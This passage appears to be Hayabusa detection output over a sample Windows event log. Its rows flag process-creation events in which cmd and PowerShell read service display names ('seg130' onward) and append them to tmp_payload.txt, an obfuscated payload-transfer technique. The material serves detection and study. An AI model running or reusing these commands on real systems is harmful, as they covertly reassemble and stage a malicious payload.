payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:34.772 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:36.225 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg130"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xdf0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:36.225 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg130"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x6a4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:36.225 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:37.694 +00:00,FS03.offsec.lan,4688,low,,Suspicious 
Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg131"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xf74 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:37.694 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg131"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xfdc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:37.694 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:39.178 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg132"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe18 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or 
Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:39.178 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg132"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd80 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:39.178 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:40.633 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg133"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x950 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:40.633 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg133"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xdcc | User: FS03$ | LID: 
0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:40.633 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:42.102 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg134"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd38 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:42.102 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg134"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x7ec | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:42.102 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive 
PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:43.595 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg135"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xde8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:43.610 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg135"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xb00 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:43.610 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:45.043 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg136"" | select 
-Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x81c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:45.043 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg136"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xacc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:45.043 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:46.509 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg137"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x490 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:46.509 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd 
Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg137"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc1c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:46.509 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:48.025 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg138"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xb18 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:48.025 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg138"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xfe4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated 
payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:48.025 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:49.478 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg139"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x474 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:49.493 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg139"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xef4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:49.493 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:50.961 +00:00,FS03.offsec.lan,4688,low,,Suspicious 
Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg140"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x61c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:50.961 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg140"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xa74 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:50.961 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:52.418 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg141"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd30 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or 
Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:52.418 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg141"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x42c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:52.418 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:53.856 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg142"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xbc8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:53.872 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg142"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd08 | User: FS03$ | LID: 
0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:53.872 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:55.310 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg143"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xcbc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:55.310 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg143"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf60 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:55.310 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive 
PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:56.748 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg144"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xc24 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:56.764 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg144"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x3f4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:56.764 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:58.217 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg145"" | select 
-Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xec8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:58.217 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg145"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe60 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:58.217 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:59.670 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg146"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe24 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:59.686 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd 
Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg146"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf44 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:59.686 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:01.122 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg147"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x22c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:01.137 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg147"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x708 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated 
